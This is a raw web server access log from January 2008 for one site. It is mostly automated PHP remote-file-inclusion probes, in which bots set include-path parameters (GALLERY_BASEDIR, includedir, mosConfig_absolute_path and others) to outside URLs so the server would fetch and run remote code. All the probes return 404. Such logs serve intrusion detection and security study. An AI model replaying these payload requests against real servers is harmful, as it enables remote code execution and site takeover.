211.21.95.220 - - [15/Jan/2008:15:13:42 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
88.84.137.155 - - [15/Jan/2008:15:15:12 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
88.84.137.155 - - [15/Jan/2008:15:15:12 -0800] "GET /logs//include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
74.6.24.31 - - [15/Jan/2008:15:22:31 -0800] "GET /megumi/Necklace/?D=D HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.38.105.135 - - [15/Jan/2008:15:23:44 -0800] "GET /include.php?path[docroot]=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [15/Jan/2008:15:23:54 -0800] "GET //tools/send_reminders.php?includedir=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [15/Jan/2008:15:24:22 -0800] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [15/Jan/2008:15:25:45 -0800] "GET /logs/access_071228.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [15/Jan/2008:15:25:45 -0800] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [15/Jan/2008:15:25:45 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [15/Jan/2008:15:25:45 -0800] "GET /logs/access_071229.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [15/Jan/2008:15:26:03 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.59.22.27 - - [15/Jan/2008:15:26:25 -0800] "GET //sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.ajir-sud.org/modules/tinycontent/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.59.22.27 - - [15/Jan/2008:15:26:27 -0800] "GET /logs//sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.ajir-sud.org/modules/tinycontent/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.59.22.27 - - [15/Jan/2008:15:26:29 -0800] "GET /logs/access_071228.log//sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.ajir-sud.org/modules/tinycontent/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.5.54.19 - - [15/Jan/2008:15:29:23 -0800] "GET /logs/access_071228.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.19 - - [15/Jan/2008:15:29:24 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.19 - - [15/Jan/2008:15:29:24 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
164.8.231.2 - - [15/Jan/2008:15:29:24 -0800] "GET /logs/access.log//tools/send_reminders.php?includedir=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
164.8.231.2 - - [15/Jan/2008:15:29:24 -0800] "GET //tools/send_reminders.php?includedir=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
164.8.231.2 - - [15/Jan/2008:15:29:25 -0800] "GET /logs//tools/send_reminders.php?includedir=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.5.54.19 - - [15/Jan/2008:15:29:33 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.19 - - [15/Jan/2008:15:29:52 -0800] "GET /logs/access_071230.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.19 - - [15/Jan/2008:15:29:52 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.19 - - [15/Jan/2008:15:29:52 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
8.6.95.148 - - [15/Jan/2008:15:29:53 -0800] "GET /logs/access_071230.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
8.6.95.148 - - [15/Jan/2008:15:29:54 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
8.6.95.148 - - [15/Jan/2008:15:29:54 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [15/Jan/2008:15:30:25 -0800] "GET /logs/access.log//tools/send_reminders.php?includedir=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [15/Jan/2008:15:30:25 -0800] "GET //tools/send_reminders.php?includedir=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [15/Jan/2008:15:30:26 -0800] "GET /logs//tools/send_reminders.php?includedir=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
8.6.95.148 - - [15/Jan/2008:15:30:30 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.5.54.19 - - [15/Jan/2008:15:31:30 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.13.23.102 - - [15/Jan/2008:15:31:36 -0800] "GET /logs/access_071229.log/calendar//tools/send_reminders.php?includedir=http://bazar.lancut.org/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.13.23.102 - - [15/Jan/2008:15:31:36 -0800] "GET /calendar//tools/send_reminders.php?includedir=http://bazar.lancut.org/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.13.23.102 - - [15/Jan/2008:15:31:37 -0800] "GET /logs/calendar//tools/send_reminders.php?includedir=http://bazar.lancut.org/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.25.34 - - [15/Jan/2008:15:33:08 -0800] "GET /tmp/?S=A HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.5.54.19 - - [15/Jan/2008:15:33:26 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.247.139.144 - - [15/Jan/2008:15:33:47 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?includedir=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.128.49 - - [15/Jan/2008:15:33:57 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [15/Jan/2008:15:33:57 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [15/Jan/2008:15:33:57 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.48.124 - - [15/Jan/2008:15:34:18 -0800] "GET //tools/send_reminders.php?includedir=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:15:34:25 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:15:34:25 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
69.57.128.49 - - [15/Jan/2008:15:34:39 -0800] "GET /logs/access_071228.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.165.28.67 - - [15/Jan/2008:15:35:04 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.165.28.67 - - [15/Jan/2008:15:35:04 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:15:35:52 -0800] "GET /tools/themes/original/img/logo_right.png HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
164.8.231.2 - - [15/Jan/2008:15:36:28 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?includedir=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.38.105.135 - - [15/Jan/2008:15:37:01 -0800] "GET /logs/access.log//send_reminders.php?noSet=0&includedir=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.135 - - [15/Jan/2008:15:37:01 -0800] "GET /logs//send_reminders.php?noSet=0&includedir=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.14.194 - - [15/Jan/2008:15:38:53 -0800] "GET /!scanhttp://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.135 - - [15/Jan/2008:15:41:22 -0800] "GET /logs/access_071229.log//send_reminders.php?noSet=0&includedir=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.98.160 - - [15/Jan/2008:15:43:14 -0800] "GET /myevent.php?myevent_path=http://www.fieldhockey.be/site/login? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
83.223.98.160 - - [15/Jan/2008:15:43:14 -0800] "GET /logs/myevent.php?myevent_path=http://www.fieldhockey.be/site/login? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
207.44.147.74 - - [15/Jan/2008:15:43:38 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.spr0x.kit.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.74 - - [15/Jan/2008:15:43:38 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.spr0x.kit.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.74 - - [15/Jan/2008:15:43:38 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.spr0x.kit.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.74 - - [15/Jan/2008:15:43:46 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.spr0x.kit.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:15:44:27 -0800] "GET /db.php?path_local=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:15:44:27 -0800] "GET /logs/db.php?path_local=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
164.8.231.2 - - [15/Jan/2008:15:46:08 -0800] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
164.8.231.2 - - [15/Jan/2008:15:46:09 -0800] "GET //includes/kb_constants.php?module_root_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
164.8.231.2 - - [15/Jan/2008:15:46:09 -0800] "GET /logs//includes/kb_constants.php?module_root_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:15:50:14 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:15:50:14 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:15:50:14 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.238.199.66 - - [15/Jan/2008:15:50:29 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [15/Jan/2008:15:50:29 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [15/Jan/2008:15:50:29 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.13.23.102 - - [15/Jan/2008:15:53:49 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://bazar.lancut.org/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:15:54:08 -0800] "GET /logs/lib/header.php?DOC_ROOT=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:15:54:08 -0800] "GET /lib/header.php?DOC_ROOT=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
65.38.105.135 - - [15/Jan/2008:15:54:46 -0800] "GET /logs/access_071225.log/include.php?path[docroot]=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.135 - - [15/Jan/2008:15:54:46 -0800] "GET /logs/include.php?path[docroot]=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.238.199.66 - - [15/Jan/2008:15:56:09 -0800] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [15/Jan/2008:15:56:10 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [15/Jan/2008:15:56:10 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.182.253.124 - - [15/Jan/2008:15:56:54 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.camenasclub.com.br/club/administrator/components/com_pollxt/pro/meng/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.182.253.124 - - [15/Jan/2008:15:56:54 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.camenasclub.com.br/club/administrator/components/com_pollxt/pro/meng/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:15:56:57 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
164.8.231.2 - - [15/Jan/2008:15:58:07 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
164.8.231.2 - - [15/Jan/2008:15:58:07 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
164.8.231.2 - - [15/Jan/2008:15:58:08 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:15:58:29 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:15:58:29 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
216.246.48.124 - - [15/Jan/2008:15:58:32 -0800] "GET /logs/access.log//tools/send_reminders.php?includedir=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.48.124 - - [15/Jan/2008:15:58:32 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.2.228.90 - - [15/Jan/2008:16:00:42 -0800] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.2.228.90 - - [15/Jan/2008:16:00:43 -0800] "GET //includes/kb_constants.php?module_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.2.228.90 - - [15/Jan/2008:16:00:43 -0800] "GET /logs//includes/kb_constants.php?module_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.6.24.145 - - [15/Jan/2008:16:03:12 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.46.118 - - [15/Jan/2008:16:03:48 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.46.118 - - [15/Jan/2008:16:03:48 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.46.118 - - [15/Jan/2008:16:03:49 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.14.194 - - [15/Jan/2008:16:05:16 -0800] "GET /logs/access_071229.log/!scanhttp://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.14.194 - - [15/Jan/2008:16:05:16 -0800] "GET /logs/!scanhttp://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.48.124 - - [15/Jan/2008:16:08:51 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?includedir=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.46.118 - - [15/Jan/2008:16:09:26 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.46.118 - - [15/Jan/2008:16:09:27 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.46.118 - - [15/Jan/2008:16:09:27 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.188.10 - - [15/Jan/2008:16:12:59 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.44.188.10 - - [15/Jan/2008:16:12:59 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
65.38.105.135 - - [15/Jan/2008:16:14:27 -0800] "GET /logs/access_071229.log/include.php?path[docroot]=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.16.96.219 - - [15/Jan/2008:16:15:03 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://34639.webtest.goneo.de/ultrastats/include/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
83.16.96.219 - - [15/Jan/2008:16:15:03 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://34639.webtest.goneo.de/ultrastats/include/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
207.44.188.10 - - [15/Jan/2008:16:15:05 -0800] "GET /logs/db.php?path_local=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
